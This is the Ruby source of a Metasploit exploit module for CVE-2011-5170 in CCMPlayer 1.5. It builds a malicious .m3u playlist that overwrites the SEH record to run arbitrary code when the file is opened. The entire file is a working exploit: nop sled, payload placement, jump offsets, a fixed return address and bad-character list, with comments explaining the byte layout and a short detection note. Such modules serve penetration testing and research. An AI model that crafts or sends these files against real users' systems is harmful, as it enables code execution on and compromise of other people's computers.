GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# File-format exploit module for CCMPlayer 1.5 (CVE-2011-5170). It does not
# talk to a target over the network: it writes a crafted .m3u playlist via the
# FILEFORMAT mixin, and the overflow is triggered only when a user opens that
# playlist in the vulnerable player (see the comment above file_create).
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT

  # Registers module metadata and the FILENAME option.
  #
  # Metadata worth knowing when reading `exploit` below:
  # - 'Payload' => 'Space' is 0x1000 and the target 'Offset' is also 0x1000;
  #   the nop sled + payload + junk region in `exploit` is padded to 'Offset'.
  # - 'BadChars' are bytes the payload encoder must avoid; the trailing
  #   comment spells them out (NUL, CR, LF, 0x1a, ',', '.', ':', '\').
  # - 'Ret' is a fixed pop/pop/ret address in ccmplay.exe that becomes the
  #   SEH handler value; 'DisablePayloadHandler' means no handler is started.
  #
  # @param info [Hash] module info overrides merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow',
        'Description' => %q{
          This module exploits a stack based buffer overflow in CCMPlayer 1.5. Opening
          a m3u playlist with a long track name, a SEH exception record can be overwritten
          with parts of the controllable buffer. SEH execution is triggered after an
          invalid read of an injectable address, thus allowing arbitrary code execution.
          This module works on multiple Windows platforms including: Windows XP SP3,
          Windows Vista, and Windows 7.
        },
        'License' => MSF_LICENSE,
        'Author' => ['Rh0'], # discovery and metasploit module
        'References' => [
          ['CVE', '2011-5170'],
          ['OSVDB', '77453'],
          ['EDB', '18178']
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => true
        },
        'Payload' => {
          'Space' => 0x1000,
          'BadChars' => "\x00\x0d\x0a\x1a\x2c\x2e\x3a\x5c", # \x00\r\n\x1a,.:\\
          'DisableNops' => true,
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'CCMPlayer 1.5',
            {
              # pop esi / pop ebx / ret (in ccmplay.exe)
              # tweak it if necessary
              'Ret' => 0x00403ca7, # last NULL in buffer is accepted
              'Offset' => 0x1000
            }
          ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2011-11-30', # to my knowledge
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.m3u']),
      ]
    )
  end

  # Builds the malicious playlist contents and writes them out with file_create.
  #
  # Byte layout of the single track line, in order (sizes from the code below):
  #   "C:\"                          path prefix
  #   25 x nop                       single-byte sled
  #   payload.encoded                the encoded payload
  #   junk                           uppercase alpha, filling to target['Offset']
  #   0xffffffff                     4 bytes read as a pointer -> access violation
  #   3 pad bytes
  #   jmp $-4103                     5-byte near jump back to the sled
  #   jmp $-5 + 2 pad                NSEH slot (4 bytes)
  #   target.ret                     SEH handler slot (pop/pop/ret)
  #   ".mp3\r\n"                     extension + line ending
  #
  # From a detection standpoint the artefact is a .m3u whose track line is a
  # ~4 KiB run of mostly uppercase letters ending in an 0xffffffff dword and a
  # fixed ccmplay.exe address; nothing is sent over the network by this module.
  #
  # @return [void]
  def exploit
    m3u = "C:\\"
    # shellcode
    # 25 single-byte nops; the same 25 is subtracted again in the junk length below
    m3u << Metasm::Shellcode.assemble(Metasm::Ia32.new, "nop").encode_string * 25
    m3u << payload.encoded
    # junk
    # fill so that sled + payload + junk is exactly target['Offset'] (0x1000) bytes
    m3u << rand_text_alpha_upper(target['Offset'] - (25 + payload.encoded.length))
    # need an access violation when reading next 4 bytes as address (0xFFFFFFFF)
    # to trigger SEH
    m3u << [0xffffffff].pack("V")
    # pad
    m3u << rand_text_alpha_upper(3)
    # long jmp: jmp far back to shellcode
    # 4103 = 0x1000 (sled+payload+junk) + 4 (0xffffffff) + 3 (pad), measured from
    # this instruction's own start, so it lands on the first nop
    m3u << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-4103").encode_string
    # NSEH: jmp short back to long jmp instruction
    # the long jmp above is 5 bytes, hence $-5
    m3u << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-5").encode_string
    # pad (need more 2 bytes to fill up to 4, as jmp $-5 are only 2 bytes)
    m3u << rand_text_alpha_upper(2)
    # SEH Exception Handler Address -> p/p/r
    # target.ret is the pop/pop/ret gadget address declared in 'Targets'
    m3u << [target.ret].pack("V")
    m3u << ".mp3\r\n" # no crash without it

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    # Open CCMPlayer -> Songs -> Add -> Files of type: m3u -> msf.m3u => exploit
    # file_create comes from the FILEFORMAT mixin; presumably it writes to
    # datastore['FILENAME'] (the name printed above) — verify against the mixin
    file_create(m3u)
  end
end